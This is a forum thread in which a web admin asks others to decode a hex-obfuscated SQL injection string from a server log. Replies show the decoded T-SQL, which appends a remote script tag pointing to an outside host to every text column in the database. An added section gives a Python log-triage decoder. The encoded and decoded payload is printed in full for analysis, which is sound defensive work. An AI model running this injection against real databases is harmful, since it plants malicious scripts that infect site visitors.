worthyking
asked on
SQL Injection (new?)
Recently we have seen a sharp increase in the amount of attempted SQL injection hacks on our web servers. I found the below in the server log last night. This looks a lot more sophisticated than the SQL injection hacks I have seen in the past. Can anyone translate this for me?
page_name.asp?zone=8&Refre sh=0&HT=ht tp;DECLARE %20@S%20VA RCHAR(4000 );SET%20@S =CAST(0x44 45434C4152 4520405420 5641524348 4152283235 35292C4043 2056415243 4841522832 3535292044 45434C4152 4520546162 6C655F4375 72736F7220 435552534F 5220464F52 2053454C45 435420612E 6E616D652C 622E6E616D 652046524F 4D20737973 6F626A6563 747320612C 737973636F 6C756D6E73 2062205748 4552452061 2E69643D62 2E69642041 4E4420612E 7874797065 3D27752720 414E442028 622E787479 70653D3939 204F522062 2E78747970 653D333520 4F5220622E 7874797065 3D32333120 4F5220622E 7874797065 3D31363729 204F50454E 205461626C 655F437572 736F722046 4554434820 4E45585420 46524F4D20 5461626C65 5F43757273 6F7220494E 544F204054 2C40432057 48494C4528 4040464554 43485F5354 415455533D 3029204245 47494E2045 5845432827 5550444154 45205B272B 40542B275D 2053455420 5B272B4043 2B275D3D52 5452494D28 434F4E5645 5254285641 5243484152 2834303030 292C5B272B 40432B275D 29292B2727 3C73637269 7074207372 633D687474 703A2F2F77 77772E6368 696E61626E 722E636F6D 2F622E6A73 3E3C2F7363 726970743E 2727272920 4645544348 204E455854 2046524F4D 205461626C 655F437572 736F722049 4E544F2040 542C404320 454E442043 4C4F534520 5461626C65 5F43757273 6F72204445 414C4C4F43 4154452054 61626C655F 437572736F 7220%20AS% 20VARCHAR( 4000));EXE C(@S);--
p.s. HT=http is the last actual URL parameter. After that the malformed URL begins.
See http://dev.mysql.com/doc/refman/5.0/en/cast-functions.html
It sets all the values in all the columns to <script src=http://www.chinabnr.com/b.js></script>
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name
FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.chinabnr.com/b.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
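An added example, not part of the original thread: a small Python log-triage helper that finds CAST(0x... AS VARCHAR) in a request line and decodes the hex, which is how the readable T-SQL above is recovered from the log entry. The function names, the indicator list and the sample line are assumptions constructed for illustration (the sample hides only a harmless SELECT), and the NVARCHAR handling goes beyond the single case shown in this thread.

```python
import re
from urllib.parse import unquote

# CAST(0x<hex> AS [N]VARCHAR...) as it shows up in a logged query string.
CAST_HEX = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s*AS\s*(N?)VARCHAR", re.I)

# Strings worth flagging once the payload is readable (assumed list, tune per site).
INDICATORS = ("sysobjects", "syscolumns", "cursor", "exec(", "<script")


def decode_cast_payloads(log_line):
    """Return the SQL text hidden in each CAST(0x.. AS [N]VARCHAR) of a log line."""
    # Log viewers and copy/paste wrap long tokens, so drop stray whitespace
    # first; real spaces in a request line arrive URL-encoded as %20.
    line = unquote(re.sub(r"\s+", "", log_line))
    decoded = []
    for hexrun, wide in CAST_HEX.findall(line):
        if len(hexrun) % 2:  # truncated entry: drop the dangling half byte
            hexrun = hexrun[:-1]
        raw = bytes.fromhex(hexrun)
        # NVARCHAR payloads are UTF-16LE, VARCHAR payloads are single-byte.
        decoded.append(raw.decode("utf-16-le" if wide else "latin-1", "replace"))
    return decoded


def triage(log_line):
    """Pair every decoded payload with the indicator strings found in it."""
    return [(sql, [i for i in INDICATORS if i in sql.lower()])
            for sql in decode_cast_payloads(log_line)]


# Constructed sample: same request shape as the logged entry, but the hex
# hides only a harmless SELECT.
HIDDEN_SQL = "SELECT name FROM sysobjects WHERE xtype='u'"
SAMPLE_LINE = ("page_name.asp?zone=8;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x"
               + HIDDEN_SQL.encode().hex().upper()
               + "%20AS%20VARCHAR(4000));EXEC(@S);--")
# Re-create the 10-character wrapping seen in the pasted log entry.
WRAPPED = " ".join(SAMPLE_LINE[i:i + 10] for i in range(0, len(SAMPLE_LINE), 10))

if __name__ == "__main__":
    for sql, hits in triage(WRAPPED):
        print("decoded:", sql)
        print("indicators:", hits)
```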
ASKER
Thanks! I should have tried that first, but I have not run into SQL queries in binary before.
ASKER
Thanks all!
Geert_Gruwez: sorry, I had already accepted the solution before I refreshed and saw your post.
No problem, now I know that SQL injection is possible too :)